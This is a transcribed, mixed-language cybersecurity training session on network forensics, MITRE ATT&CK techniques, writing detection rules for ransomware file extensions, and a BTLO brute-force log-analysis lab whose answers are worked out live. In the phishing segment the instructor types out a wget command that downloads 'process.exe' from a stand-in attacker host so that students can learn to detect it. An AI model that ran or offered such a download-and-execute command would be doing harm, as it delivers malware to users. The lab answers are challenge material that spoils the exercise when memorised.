Okay, so in today's session, we will be discussing about network forensics. Okay, and I have shared the requested files on WhatsApp. One is uploading, and another one is on its way. After the theoretical session, let's do the practical one from BTLO. Okay. So today's session will be about network forensics and lateral movement detection. When we talk about the analysis or the detection of anomalous traffic, we are talking about the behavior of one packet is not being transmitted to the intended location, or one packet is doing some anomalous during the transmission of the packet. Okay, so let's say that we have this infrastructure and there's a traffic flowing from all of it. Now the normal traffic should go from the normal travel. Let me just delete this. So these are endpoints. So let's say these are endpoints, and the endpoints should be free from any intrusion and any intrusion from the network side. Let's say that this has an IP of 10, 15, or 16.11.9, and this is this should be connecting to DC that has an IP of 192.168.17.66. So that's our, let's say, US GC01, and that is Jack's endpoint. So the endpoint naming will be US dash New York, so NY01. Okay. Now this has to connect to this IP for authentication for Active Directory or for any other services that this has to do. Let's say for DHCP. So what happens is, just give me a second.
एम आई ऑडिबल टू यू? यस, आई गेस मेरी आवाज़ आ रही होगी आप लोग को। अच्छा बॉयज, सो सॉरी। ओके, कंटिन्यूइंग। सो लेट्स से कि ये वाली ट्रैफिक जो है ना, अब 192.168 ऑलरेडी कंप्रोमाइज्ड है, ठीक है। ओके, तो यहाँ पर क्या होगा फिर कि जो ट्रैफिक यहाँ से जा रही है, या वट एवर हैपनिंग इन हियर, द अटैकर कैन सी, ठीक है, कि दिस इज compromised and the attacker is inside doing whatever he wants and he is in the infrastructure, तो वो कुछ भी कर सकता है, ठीक है। How do we do the investigation of this traffic? How do we know that? And let's say the IP is very similar to this. Okay, he is, it's something like this, ठीक है। How will we detect this traffic? Because ये हमेशा हमें legitimate लगेगी, right? Whenever you are doing the monitoring of the dashboards, you need to be understanding the environment of your company. So अगर हमारे पास यहाँ पे एंड पॉइंट्स हैं और हमारे पास यहाँ पे डीसीज हैं, तो यू शुड नो कि इस पूरे आर्किटेक्चर में और क्या क्या लगा हुआ है, ठीक है। आपको पता होना चाहिए कि where is your DMZ and where is your firewalls, where is your web applications. So you should know the whole infrastructure, okay। तब जाकर आपको पता चलेगा कि ओके अटैक्स कहाँ से आ रहे हैं। हमारे पास, let me open the MITRE, okay wait, MITRE attack, ठीक है। अब MITRE अटैक के अंदर, अब MITRE अटैक के अंदर यहाँ पर कौन सा बहुत क्रिटिकल, वैसे तो सारे ही हैं, बट कौन सा वो व्हाट विच टेक्निक इज वेरी क्रिटिकल इन डिटेक्टिंग द नेटवर्क, which technique? लेटरल मूवमेंट भी हो सकती है, राइट। अच्छा, डिस्कवरी भी हो सकती है। डिस्कवरी में हमारे पास अकाउंट डिस्कवर हो सकते हैं। if he has compromised the DC, he can have the access to the AD, right? AD में अगर एक्सेस हो गया आपका, तो आपके पास दूसरे अकाउंट्स भी, आपके पास दूसरे यूजर्स भी आ सकते हैं, ठीक है। Command and control, one of the techniques that can be used to send malicious commands and control the compromised endpoint. So what else can happen? So यहाँ पर जितनी भी टेक्निक्स और टेक्टिक्स दिखाई है ना, तो यहाँ पर सारी कहीं ना कहीं रिलेट करती हैं, बिकॉज somehow you need to do the investigation of you need to do the investigation of different alerts that you receive regarding the internet.
आई थिंक I'm sharing one screen only. Wait. मैं आप लोगों के साथ let me present something else here. और मुझे आप लोगों के साथ माइटर अटैक खोला था मैंने. वेट. माइटर अटैक ठीक है. तो अब यहाँ पर जितनी भी टेक्निक्स है ना, लाइक लेट्स से दैट कमांड एंड कंट्रोल की टेक्निक है. ठीक है, तो कमांड एंड कंट्रोल कैसे होगा? ठीक है, हमारे पास ये टेक्निक है कमांड एंड कंट्रोल की. एंड इसके अंदर फिर वो डेटा एनकोडिंग भी कर सकता है, इंजेक्शन भी कर सकता है, प्रोटोकॉल टनलिंग भी कर सकता है. व्हाट इज प्रोटोकॉल टनलिंग? व्हाट इज प्रोटोकॉल टनलिंग? What is protocol tunneling? What about do you guys know what is DNS tunneling? What is DNS tunneling? What are DNS attacks? So you should know कि हमारे पास जो है ना DNS पे कौन कौन से अटैक्स आते हैं. एंड प्रोटोकॉल टनलिंग का मतलब ये है कि whenever there is a protocol, let's say कि हमारे पास HTTPS की प्रोटोकॉल यूज हो रही है, right? But to avoid detection, the attacker use another protocol that will hide the current protocol. ठीक है. तो protocol tunneling is one of the techniques that can be used for command and control. अच्छा, how can this be a technique that can be used? Okay, so there is DNS over HTTP queries. What happens if there is DNS over HTTPS? You can reroute the victims. You can reroute the victims the endpoint to your domain. Let's say that if you have a domain of abc.xyz and you provide another domain to resolve it, not on behalf of HTTPS, on behalf of DNS. So what happens is that you're hosting the adversary is hosting the domain will be translated through this HTTPS, and that would seem legitimate. ठीक है, तो डीएनएस टनलिंग के कुछ हमारे पास सी हमारे पास कोबल ग्रुप है which uses the p-link utility to create SSH tunnels. ठीक है, कोबल स्ट्राइक is a custom command and control protocol that is encapsulated in HTTP and HTTPS और DNS. So यहाँ पर हमारे पास यूडीपी का भी प्रोटोकॉल यूज हो सकता है. Hidden face. Hidden face, right? Hidden face can hide its IP lookup by using DNS over HTTPS. One of the main examples. ठीक है. तो this is just one technique. There are many techniques that can be used for attacking the network. Let me go to enterprise. Wait, let me go back. What is the stealth technique? सो स्टेल्थ टेक्निक की बेस्ट एग्जांपल आपके पास रूट किट है, राइट? कि हमारे पास कुछ रूट व्हाट इज अ रूट किट? एनीवन, व्हाट इज अ रूट किट? और सर जो वायरसेस होते हैं कर्नल लेवल के, तो उनको शायद ट्वीट कहा जाता है, जो अ, मतलब ड्राइवर्स में आ जाते हैं या कर्नल लेवल पे आ जाते हैं, जैसे कि जिससे आपका
OS लेवल के अबव लेयर को अफेक्ट नहीं करते, नीचे वाले को करते हैं, या बायोस को इफेक्ट कर देते हैं, जिसकी वजह से वो एक तो डिटेक्ट नहीं हो पा रहे हो, तो दूसरा इवन के क्लियर करने पे भी वो एग्जिस्ट करते हैं, क्योंकि वो नीचे लेवल पे किसी न किसी रूट लेवल अंडरग्राउंड पे होते हैं वो। जी रूट लेवल पे होते हैं। यस, तो रूट किट का नाम ही यही है कि रूट लेवल पे बैठे होते हैं और दे कैन नॉट बी डिटेक्टेड। ओके, सो इसके अंदर हमारे पास नेटवर्किंग अटैक क्या बन सकता है, सिनेरियो क्या बन सकता है कि रूट किट भी कनेक्ट होता है एक विक्टिम के नेटवर्क पर, ठीक है, सॉरी एक एडवर्सरी के नेटवर्क पर, लाइक इफ आई एम होस्टिंग ए, if I'm hosting a let's say just I'm attacking a machine, right, and I'm hosting a DNS or a domain, and I have compromised that machine, but I need to do persistence. What I'll do, and I want to be also stealth while doing that. What I'll do, I'll download the rootkit and I'll stay hidden inside the rootkit. And whenever the Windows or the endpoint starts, that endpoint will connect to the adversary's machine or to my machine. Rootkits are, because Windows हर जगह होता है तो rootkits भी विंडोज ज़्यादातर यूज़ होता है, राइट, बट अब तो लिनक्स भी, हम आपकी कितने वेब सर्वर्स लिनक्स पे होस्ट हो रहे होते हैं, एंड रूट किट्स हमारे पास विंडोज़ के अंदर भी हो जाते हैं, ठीक है। तो हमारे पास यहाँ पर नीचे सारे एग्जांपल्स आ जाती हैं, ठीक है। जब भी आप कोई डिटेक्शन स्ट्रेटेजी बनाते हो ना, तो आप उठाकर इधर ही से पैरामीटर्स ले लेते हो, राइट, एंड देन यू क्रिएट अ रूल अगेंस्ट इट। Unauthorized or anomalous loading of kernel model drivers, DLLs. What can you do is you pick famous DLLs used in the Windows, right? And let's suppose that ntdll.dll is used for layer library to to a link between the application and kernel of the Windows. So ntdll.dll के ऊपर हम लोगों ने एक टूल बना दिया उठाकर कि whenever this process is executed, whenever there is a process who is using ntdll.dll and that process does not seem to be suspicious or it seems to be malicious, in both scenarios we should receive an alert. What happens is कि हमारे पास रूट किट, फिर जो रूट किट वगैरह की जो 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 थोड़ा सा शक होता है, राइट, थोड़ा सा कुछ मलेशियस हो सकता है उस डीएलएल की वजह से, वो फिर नहीं आएगा, राइट, वो फिर वी कैन हैव अ डिटेक्शन टेक्निक अगेंस्ट इट। व्हाट इज \dev? ये वह होता है लिनक्स में, बट व्हाट इज \dev? लिनक्स में जब लोड कर रहे होते हैं, अब इसमें ना आ जाता है कि समटाइम्स हम लाइब्रेरी से लोड कर रहे होते हैं, और समटाइम्स ये होता है कि हम कर्नल मॉड्यूल जो हमसे हैं, जो कस्टम मॉड्यूल होते हैं हमारे अपने में, उनकी लोडिंग और ये यूज़ कर रहे होते हैं। डेव का तो वैसे जितनी भी ये अटैचड डिवाइसेस होती हैं उनके लिए यूज़ कर रहे होते हैं, और जो बाकी आ जाता है एल डी के लॉजिकल, व्हाट अबाउट लॉजिकल डिवाइसेस? लॉजिकल डिवाइसेस भी वो इसी में ही शो करते dev dev हैं। backslash dev backslash null. बल्कि वो फिजिकल डिवाइसेस सॉरी शो कर रहा होता है, जहाँ तक मुझे हाँ। याद है। लॉजिकल का मुझे याद नहीं है, इसमें शो कर रहा होता है। प्री लोडेड का ये होता है कि हम्म। प्री लोडेड का ये होता है कि लाइब्रेरीज लोड करने है। मॉड्यूल्स का तो मुझे याद नहीं पता, लाइब्रेरीज लोड की हुई नहीं नहीं, वो ये तो काम जाहिर है। सी बात है, मॉड्यूल थोड़ी कोई याद रखता है, बट dev और null, ठीक है, ये डायरेक्टरी, एंड यू आर राइट, यू कैन हैव the physical and logical devices under that file. And what can we do to that? Like, अच्छा ठीक है, हमारे पास physical और logical devices तो हैं, but
अटैकर के पॉइंट ऑफ व्यू से आप किस तरह इसको देखते हो? आप लोगों ने कभी वो हैक द बॉक्स वगैरह, या आप लोगों ने कोई मशीन को अटैक किया है? सो वेन एवर वी अटैक द मशीन, हम लोग एक फाइल हम लोग ड्रॉप ड्रॉप करते हैं, राइट? हम लोग जब बैश की कोई फाइल बनाते हैं तो हम लोग डेव और नल में जाके फेंकते हैं इन ऑर्डर टू ओपन द सेशन। तो हम लोग यहाँ पर जो है ना, एक एक्स्ट्रा फिजिकल या लॉजिकल ड्राइव बना रहे होते हैं, जो हमें फिर ऑथेंटिकेट करने के लिए, ठीक है? यहाँ पर अगर हम लोग को रूल बनाना है तो हम लोग कैसे रूल बनाएंगे कि whenever there is a modification happening under dev, there should be an alert triggered, ठीक है? तो इसी तरह है, ठीक है? इसी तरह आप अगर आप चलते जाओ, आप सेलेक्टिव एक्सक्लूजन्स पे आ जाओ। सेलेक्टिव एक्सक्लूजन्स मींस के हमारे पास जब रैंसमवेयर पड़ता है ना, तो हमारे पास बहुत सारी फाइल टाइप्स होती हैं, लेकिन सिलेक्शन एक्सक्लूजन में क्या होता है कि वो स्पेसिफिक फाइल टाइप्स को इनक्रिप्ट कर देता है, राइट? तो अ, यहाँ पर एक अगर रूल बनाया जाए तो हम लोग किस टाइप का रूल बनाएंगे? क्या हमारे पास कोई भी लाइक लिटरली हमारे पास जो है ना, अगर हम लोग सर्च भी करें ना कि गिव मी abnormal file extensions in Windows, so see .log, .log, .crypto, .ecc, .ezz, .ps1, .msi, .cmd, .js, sys, .cpl, .drv, .temp, .tmp, .log, .dum, .enc, .crypt, .encrypted, right? So you can create rules against those files. आप एक रूल क्रिएट करोगे एंड पॉइंट के ऊपर, एंड पॉइंट के जो टूल लगा हुआ होगा, ठीक है? और उसके ऊपर आकर कुछ कुछ कंडीशंस दोगे और उसको बोलोगे कि I'm gonna show you what I mean. So this is how you create a rule. Look at this. Okay, wait. मेरे पास एक और तरीका है। फिर सर रूल तो वैसे किसी भी लैंग्वेज में डिफाइन कर सकते हैं। किसी भी लैंग्वेज में, ये तो मैं आपको एक एग्जांपल दिखा रहा हूँ कि अ, मैं अगर लेट्स से कि XDR कोटेक्स XDR में कर रहा हूँ, ठीक है? तो ये मैं एक एग्जांपल दिखा रहा हूँ, ठीक है? मैं भी आप लोग को इसका बताता भी हूँ कि सारे ये पैरामीटर्स होते क्या हैं। और आप लोग अगर रियल लाइफ में अगर कोई भी लैंग्वेज उठा के देख लो, देखो लॉजिक हर लैंग्वेज की सेम होती है, राइट? मतलब अगर लेट्स से कि अगर आपको 1+1 चाहिए तो इट विल बी 1+1 इज इक्वल टू 2, राइट? तो वो हर लैंग्वेज में इज इक्वल टू 2, 1+1 की लॉजिक लगानी है एंड देन यू विल इट विल टेल यू दैट दैट इज 2। इट डिपेंड्स ऑन द लॉजिक, राइट? लेकिन आप सर मैं एक दफा बेसिक अभी नहीं जब बीएस कर रहा था तब हम्म एक बेसिक सा टूल बना रहा था। वैसे जैसे ये नहीं कि कोई क्वेरी के ये कुछ ऐसा, जस्ट वैसे लर्निंग के लिए बेसिक पाइथन लर्निंग कर रहा था। तो वो उसमें था सर सिंपल ये था कि जो कनेक्शन एस्टेब्लिश पे देख रहा था कहाँ से कनेक्शन एस्टेब्लिश फर्स्ट हो रहा है, इन हम्म बाउंड आउट बाउंड है, ये तरह की फाइल का एक्सटेंशन देखे कि रीड करे जितनी भी फाइल सॉरी वो आ रहे हैं ट्रैफिक है, ट्रैफिक हम्म में शेल हो गया, इस तरह के कीवर्ड डाल दो तो जैसे ही पाइथन के स्कूल में जैसे ही वो डिटेक्ट करता है बता देता है कि इस प्रोसेस के साथ ये भी एग्जीक्यूट हुआ है और इसके साथ शेल फला फला ये वाले जो भी हमने रखा है तो उसको शो कर देते हैं कि इस तरह से था। तो वो थोड़ा सा ये था पाइथन के साथ इस तरह से बनाने। और आपको पता है यू कैन क्रिएट एन AI एजेंट टू डू दैट जो आप बोल रहे हो।
AI agent बनाकर you can do whatever that you just suggested थ्रू पाइथन, और वो करेगा भी पाइथन के, वो कोई भी लैंग्वेज यूज करे, लेकिन वो इस तरह की जो आउटबाउंड इनबाउंड ट्रैफिक है, जो मलिशियस ट्रैफिक है, वो बताता रहेगा कि भाई ये सारी मलिशियस ट्रैफिक है। बिल्कुल सर। वो एक मतलब आपको यहाँ पर देखो, आपने एक सवाल किया एंड देन यू जस्ट आस्क हिम टू क्रिएट अ क्यूरी फॉर यू। एंड बाय द वे, ये सारी जो है ना, आप इसको किसी भी लैंग्वेज में बोल दो, ठीक है। ये तो हमने बोल दिया इसको एक्सक्यूएल में, ठीक है। नाउ लेट्स से कि हमें EQL में चाहिए। उसके बाद वजह से ये पहले की बात बता रहे थे, एआई सब यूज नहीं करते थे, कुछ नहीं पता नहीं बता रहा था। तो किसमें किसमें किसमें? मतलब एआई इस तरह से यूज नहीं करते थे, ना ही क्रेडिबिलिटी का कुछ ऐसा यूनिवर्सिटी के दोनों बता रहे थे कि इस तरह से इससे बच्चे प्रैक्टिस वैसी सी की थी, तो वो बताना था। तो बहुत तरह से किया, तो बाकी उससे बात हो ऐसा ऐसा आइडिया हुआ था स्नोड है, इसका तो आइडिया हुआ कि जरूरत ही नहीं पड़ती स्नोड ये होते हैं। हाँ, नहीं ये सारे तो बहुत अच्छे अच्छे, देखो जो डिटेक्शन टूल्स जो ऑलरेडी मार्केट में है ना, वो तो बहुत अच्छे टूल्स बने हुए हैं। एंड ऑल्सो यार, अपनी लर्निंग नहीं रोकनी चाहिए फॉर स्पेशली आपका जो प्रोग्रामिंग पे आती है, ठीक है। यू शुड नो हाउ टू डू स्क्रिप्टिंग। और ट्रस्ट मी, इन सब की जो है ना पाइथन स्क्रिप्ट भी बन जाती है। मैं आपको अभी वो भी करके दिखा देता हूँ, देखो। अब उसने मुझे उसके अंदर दे दिया, AQL में दे दिया। नहीं यार, ये AQ एरियल लैंग्वेज में तो नहीं दिया ये। SQL में दे रहा है ये तो। ओके, ये इसने इसमें यहाँ पे नहीं दिया है, ये SQL है। और अच्छा, हाँ सही है, ठीक है ठीक है ठीक है ठीक है ठीक है ठीक है ठीक है। ये भी लैंग्वेज, ये भी आपके पास ना, इससे भी एक रूल क्रिएट हो जाता है, ठीक है। तो why am I showing you this is you just need a logic, and if you know how to use AI, you can create rules through AI. And what I suggest is do not rely on AI. You should know how to write the queries. We have learned how to write the queries. ठीक है, तो we if we start from the data set, XDR or Cortex XDR has many data sets, ठीक है। It can take from the network, it can take from the environment itself, it can take from the XDR data that is stated here. What does filter event type? What is filter? What kind of filter is he applying? He's applying the file filter. Okay, and then the subtype is event subtype. Whenever there is an event happens, एक process create हो जाता है, right? But what is the subtype of the event? This is the main type. The event type is the main type, right? And then this is the subtype of the event. Means that nm.file and nm.file underscore rename. So this is giving the condition. Let's say that there is an event that recorded the file enumeration. Okay. So what happens after file enumeration? He is giving the renaming. After renaming, he is giving the OS Windows agent, right? The OS Windows hona chahiye. It can, here we can also apply Linux and Unix as well. Then he is giving, then he is giving, okay, then he is giving the filter action file name, then p match, and then he is giving all the extensions, all the file extensions, right? Fields means that whenever this the whole data is fetched, what kind of data that I need in my dashboard. And then he's stating that I need to see the time, the name, the host name, the actor who's doing that, the username, the process image name. Okay, that's how you can create a query, and these queries are already built in, like you don't need to create it by your own. I'm just taking a short break. Let me just come back in few minutes, okay?
थोड़ा सा मुझे टाइम दो।
अस्सलाम सर। सर वेट कर रहे हैं कब कंटिन्यू करेंगे।
Yes, hello everyone. I'm so sorry. You guys here? I think बिलाल आप ही रह गए शायद. हाँ बिलाल, मेरी आवाज आ रही है आपको? Okay, so I'm continuing this. In case you missed something, आप जाके जो है ना इसकी रिकॉर्डिंग देख लीजिएगा. और दूसरा ये है कि हम लोग जो है ना इसके ऊपर बात कर रहे थे, माइटर अटैक की बात कर रहे थे, राइट? जी जी सारी तरीके अभी ठीक है ठीक है ठीक है. सो सॉरी यार, थोड़ी सी देर हो गई मुझे. अच्छा. हम लोग सिलेक्टिव एक्सक्लूजन्स की बात तो कर रहे मानो थे. क्लास ले लो सोशल सोशल इंजीनियरिंग के अगर अगर हम आ जाएं तो सोशल इंजीनियरिंग के यार बहुत सारी टेक्निक्स आप लोग जो है ना उसके अगेंस्ट यू गाइस कैन क्रिएट रूल्स अगेंस्ट इट. यू गाइस कैन डिटेक्ट यूजर्स एग्जीक्यूटिंग कमांड्स. ठीक है. लेट्स से कि हमारे पास एक ईमेल रिसीव हुई है, राइट? एंड इन दैट ईमेल के आपके पास बोल रहा है कि यू नीड टू अपडेट योर पासवर्ड. यू जस्ट हैव टू डू दिस. And there is a process.exe. ठीक है. And you should execute this command. The non-technical guy will execute this command. इस command से क्या होगा? He can download. He can download something, right? He can download. Let's say कि if we do cmd and wait, मैं अपनी ना पूरी स्क्रीन शेयर कर रहा हूँ आपके साथ ताकि आपको दिखाई दे because wait, let me reshare my screen. Stop sharing and then let me reshare my screen, entire screen, and then share. I'm going back to my VM. Um, Let me do this here. wget http hacker.xyz process.exe. Once we do this, what happens is if there is a file existed on this platform, ये फाइल हमारे पास डाउनलोड हो जाती है. ठीक है. एंड देन आफ्टर दिस हैज बीन डाउनलोडेड व्हाट कैन हैपन के दिस कैन बी एग्जीक्यूटेड बाय इटसेल्फ या इसके अंदर कोई ऐसा लेट्स से कि ईमेल के अंदर एक और आपके पास एक और कमांड हो दैट सेज दैट नाउ यू नीड टू एग्जीक्यूट दिस प्रोसेस. ठीक है. और वो जाके जो है ना वो प्रोसेस भी एग्जीक्यूट कर देता है. तो वन ऑफ दी टेक्निक्स आप ये यूज कर सकते हो फॉर सोशल इंजीनियरिंग कि आप लोग जो है ना ये ईमेल्स की सिक्योरिटी करो. ठीक है. और इसके अंदर जितने भी कमांड्स आ रहे हैं you guys can detect those commands and then add it to your rule which can in future कि अगर ये कमांड डिटेक्ट हो रहा है किसी भी यूजर से it should be shown on the dashboard. ऐसी बहुत सारी हमारे पास टेक्निक्स आ जाती हैं जो कि यूज हो सकती हैं फॉर detecting the network intrusion and the anomalous that is happening in the network. ठीक है. हम लोग आज BTLO का एक सेशन एक कोई एक वो कर लेते हैं. मेरे पास ना आई थिंक सिक्योरिटी ऑपरेशंस द रिपोर्ट टू. इसके अंदर हमें क्या यूज करना है? दिस चैलेंज इज एन एक्सटेंशन फॉर एन एक्सिस्टिंग द रिपोर्ट चैलेंज वेयर यू आर वर्किंग इन अ न्यूली established software. There is still a lot of work to do to make it a fully functional one. As part of the SOC improvement process, you were assigned a task to study
a report released by MITRE and suggest some useful outcomes for your SOC. So this challenge, what do we need to use? This challenge is challenge for report link. Okay, that's an interesting one. Okay, we can come here. Let's see what happens. क्या हम लोग अगर यहाँ पे आ जाते हैं तो बिलाल मेरे साथ ये चैलेंज कर रहे हैं ना? जी सर, मैं कह रहा हूँ, मैं जैसा आपको भी देख रहा हूँ स्टार्ट में आप कैसे कर रहे हैं, तो फिर मैं स्टार्ट कर रहा हूँ। चलो सही है, ठीक है। आई थिंक इधर ही से हम लोग को एनालिसिस करना होगा ना। कि हमारे पास क्वेश्चन नंबर सबमिट द नेम ऑफ द यूनिट्स टीम्स इन शॉर्ट फॉर्म दैट आर रिस्पांसिबल फॉर मेंटेनिंग network and other equipment incident detection and response and security compliance risk management team 1 2 3। तो ये तो बहुत बड़ी वो है, राइट? इसके अंदर से हम लोग इसके इसके अंदर से अगर हम लोग वो निकाल दें सर पीपल इसमें कोई प्रोसेस। फाइल, इस लैब में कोई फाइल डाउनलोड करनी है या नहीं? नहीं नहीं, बढ़िया। कोई कोई फाइल डाउनलोड सर यहाँ तो। लिखा हुआ है बीटीएलओ रिपोर्ट टू और जिप के नाम से। अच्छा। जी सर, और ये तो 14 MB की है, 14.4 MB की। और ओके, इसमें इन्होंने ये देखो, ये डाउनलोड करने की जरूरत नहीं है वैसे। अगर आप यहाँ पर जाओ ना तो ये वो सेम फाइल है। ये देखो यहाँ पर वो रिपोर्ट लिंक यहाँ पर है। यहाँ से आपको उठा के करनी है जो भी करना है। ओके, हमारे पास यहाँ पर जो है ना टीम्स to bulk up IR reporting, ownership of assets, log management teams, analysis, collaborative। एक मिनट यार, रुको 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 रुको। वैसे ये देखो, ये भी एक लर्निंग है, ठीक है। ये जो है ना हम लोग इसको एज अ होमवर्क ले लेते हैं। इसको अभी हम लोग साथ में नहीं कर रहे, ठीक है बिलाल? जैसे आप कहते हैं सर। इसको हम जैसे लोग एज अ होमवर्क ले लेते हैं, वेट। Okay, let me go back here. अच्छा, यहाँ पर बोल रहा है डॉट। लेट मी सी इसके अंदर क्या है। सेफ, दैट्स एन इंटरेस्टिंग वन। अच्छा देखो, हमारे पास जो है ना, नाउ वी कैन, हाउ मेनी ऑडिट फेलियर इवेंट्स आर देयर, count of events, audit failure events, what is the first thing that I'll do? So the सर, first ये question, कोई और लैब आपने स्टार्ट की अभी?
जी जी जी, ये कोई और लैब है, ब्रूट फोर्स वाली है ये। अच्छा अच्छा। मैं आपको उधर वो कर देता हूँ, पेस्ट कर देता हूँ, ये लो। अच्छा, तो हियर वंस यू डाउनलोड दिस फाइल, यहाँ पर आपको बोल रहा है कि हाउ मेनी ऑडिट फेलियर इवेंट्स आर देयर। ठीक है। तो द व्हाट वाज द फर्स्ट थिंग दैट आई विल डू, कि मैं जाके देखूंगा ऑडिट। इट्स लोडिंग। सर एक क्वेश्चन था, उस इमेज से वो डायरेक्टली मैंने सिस्टम में ओपन किया लेकिन वो हैंग हो गया। कोई इशू तो नहीं है इस फाइल में, या ऐसा कोई गड़बड़ से इसे डायरेक्टली ओपन ना करें आप? नहीं नहीं नहीं, कोई इशू नहीं है। सही है। कोई इशू नहीं है। ओके वेट, क्लोज एक्सेल, मैं इसको डब्ल्यूपीएस में खोल लेता हूँ। यार मसला हो रहा है, वेट।
नहीं आएगा, उस फॉर्मेट में नहीं आएगा ये। ये आया है ना, वेट, यहाँ पर से हम काउंट कैसे करेंगे? दैट्स अ चैलेंज। 4625। अच्छा, ये हो गया। एक, दो, एक मिनट, ऑडिट फेलियर से सर्च करते हैं ना, ऑडिट फेलियर से। यहाँ से देखते हैं, नेक्स्ट नेक्स्ट। ओके, दिस इज नॉट द वे टू फाइंड थिंग्स, क्योंकि इस तरह तो हमें बहुत टाइम लग जाएगा। um, वही नहीं कर।
ये है 00FD985। ओके, सो अनजिप 00FD। सर उसी फाइल को भी देख रहा था, आईपी मिली थी और कंट्री और बाकी ऐसे साथ साथ सॉल्व कर रहा अच्छा, था विंडो से। मेरे पास अभी और कुछ है नहीं था तो मैंने इसी से ट्राई करा। अच्छा सर। नहीं नहीं, अच्छा आईपी। किया। बाकी वो जो काउंट वाला है ना, काउंट वाले में मुझे इशू आ रहा है, इसीलिए मैंने बोला कि यहाँ से देख के कर लूँ। सही है सही है। अच्छा, उसने तेरी अनजिप कर दिया, ओके। तो हमें सबसे पहले अकाउंट निकालना है ऑडिट फेलियर का। तुम्हारा है ना? देखो हमारे पास, लेट्स से कि हमारे पास जो आ रहा है ऑडिट विच ऑडिट फेलियर, एंड देन ओके, ये तो बहुत सारे अकाउंट्स आ गए। 3103, 3103, ट्राई 3103। ओ दैट्स करेक्ट। ठीक है, ओके। नेक्स्ट क्वेश्चन इज व्हाट इज the username of the local account that is being सर ये तो targeted? विंडो वाले से कर रहा था, बता दो या अभी ना रहा पूरी तरह। क्या क्या क्या? ये कुछ चीजें ढूंढ ली थी जैसे, हाँ मैंने अब ये रहता था फर्स्ट वाला भी नहीं किया, जो जो मैंने वहीं से विंडो वाले में मिला वो वहीं से सिर्फ आगे से कर लिए थे। यूजर नेम मिल गया था ठीक और है। आईडी मिल गई थी और बाकी उसमें आईपी मिल गई थी और कंट्री मिल गई थी। अभी बाकी के उधर से उसी फाइल से देख के कर रहा था। सही है, अच्छा। आईपी तो थी, आईपी तो मैंने भी देखी थी, आईपी तो आपके पास ये वाली आ गई ना। ये वाली आईपी आ गई ना। जी सर। ठीक है। 4625, या 4625 की आईपी है। व्हाट कंट्री इज दिस आईपी एसोसिएटेड विद? तो यहाँ पर द बेस्ट वे इज दैट वी डू abuse ipdb.com and then we search the IP. इधर बाबा को चला रहे हैं।
So the country is Vietnam. Okay, now what is the username of the local account that's being targeted? तो यहाँ पर अगर हम लोग सर्च करें तो यहाँ पे बोल तो रहा है अननोन यूजर वर्क स्टेशन नेम. This is the account that is being targeted. Probably this is the account. Yes, this is the account. What is the failure reason related to the audit failure logs? तो यहाँ पर जो है ना हमारे पास ऑडिट फेलियर लॉग्स का ये है फेलियर रीजन ये आ रहा है. ठीक है. दैट इज अननोन नेम और बैड पासवर्ड. What is the range of source ports that were used by the attacker to make these login requests? Lowest ports to the highest ports. अच्छा. ओके सो पोर्ट कैसे ढूंढेंगे हम लोग? देखो सोर्स पोर्ट आ रहा है 59545, 59533. Okay, let's say okay, we do grep, we do dash I, we do port, sorry, BTLO. Okay, 59545, नहीं 59545, 51842. This is the lowest port. ठीक है, 51842. एंड देन यहाँ पे आकर एंड देन हाईएस्ट पोर्ट. ठीक है. तो यहाँ पे हाईएस्ट पोर्ट 6 की सीरीज में आ रहा है. यहाँ पे आ जाता है लास्ट पोर्ट 65534. 65534. दैट्स रॉन्ग. What is the range of source ports that were used by the attacker to make this login request? एक मिनट देना यार. डॉक्टर पाशले, डॉक्टर पाशले, बाहर. ओके तो ये वाला तो हमारे पास गलत बता रहा है. व्हाट इज द रीजन? अच्छा वेट, 50 वाला भी तो टारगेट हो रहा है. 50 से शुरू हो रहा है ना. हम लोगों ने गलत नंबर ले लिया. 500. नहीं 500 भी नहीं. 4 की सीरीज से शुरू हो रहा है यार. क्या हो गया उमर? 49177. ओके ये गलत है. 49177. 49177. 65534.
65534 49177 यही तो है। लोएस्ट पोर्ट द हाईएस्ट पोर्ट, तो लोएस्ट पोर्ट तो 49177 ही है। तो 65534, क्या मसला है? आपने किया सॉल्व ये वाला या अभी कर रहे हो, इस ढूंढ रहे हो आंसर? सर पोर्ट्स बहुत ज़्यादा है तो वही बस फाइंड कर रहा हूँ। मेरे पास असल में उठा नहीं कुछ टूल, तो इसी तरह देख रहा था मैं, बस ये पोर्ट्स वाला रहता है मेरा। अच्छा अच्छा। 49177, 49177. So this is still the higher. This is still higher than 49177. DPT is equal to 0 minus 9 forward slash plus BTLO cut sort. Nothing happened. I have a way
to do this. ये तो बहुत ज़्यादा पोर्ट्स हैं यार. हम्म. अगर हम 49162. जी ओके. सर, फोर तो नाइन पावर वन शेल में सिक्स लिखा वैसे हो गया, पावर शेल में भी हो गया। पावर शेल में लिखा है. क्यूरी दिखाओ, क्यूरी बताओ मुझे, क्यूरी सेंड करो. मैं भेजता हूँ। मुझे क्यूरी भेजो, मुझे 1 मिनट दो बस. सर शेयर किए क्यूरिया कुछ।
अरे यार सॉरी यार। ओके तो नाइस, वेरी नाइस। طيب طيب يا محمد, ये देखो अभी मैंने किया है बिकॉज नाइस यार, आपके पास उसकी स्किल्स हैं, स्क्रिप्टिंग की स्किल्स हैं। ये फर्स्ट पुट, यस वेरी नाइस, गुड यार, बहुत मजा आया यार। 49162, ये वाला मेरा पोर्ट गलत हो गया, 49162 वाला। असल में सर कुछ आगे पीछे 4 टेस्ट हुए होंगे जिसकी वजह से वो इशू आ रहा था। तो असेंडिंग ऑर्डर में पहले करके ना, उसके बाद फिर आप उसको जब देखते हैं तो वो निकल आता है। और पता है मैंने, मेरा मसला क्या हुआ कि उसने ना रैंडम निकाले हैं, राइट? देखो 6 चल रहा है, फिर 4 चल रहा है, ऐसे ही ये सर। देखो 49, अब 4949 अगर आप देखो ना तो 49162, ये देखो यहाँ पे 162 आ रहा है, ला हौला वला कुव्वता इल्ला बिल्लाह, देख रहे हो? ऐसे ही है सर। तो ऊपर, अब ऊपर मैंने ऊपर जो देखा 491, सॉरी 494 की सीरीज शुरू हो जाती है ना, हाँ ये देखो ये 4 की सीरीज शुरू। अब देखो यहाँ पर 49177 है, लेकिन अगर हम लोग यहाँ पे, अगर मैं नीचे जाता थोड़ी सी एक्सप्लोरिंग और करता ना, 49, ये देखो 491 जी जी 162 सर, का आप लोगों को कह रहा हूँ कि वो अगर असेंडिंग ऑर्डर में ये इस तरह से पहले अरेंज करें उसके बाद फाइंड करें तो मिल जाता है। मिल जाता मुझे। और एक और तरीका है, अगर मैं इसको इसको दूसरी फाइल में सेव करके अगर सर्च करूंगा तब भी मुझे 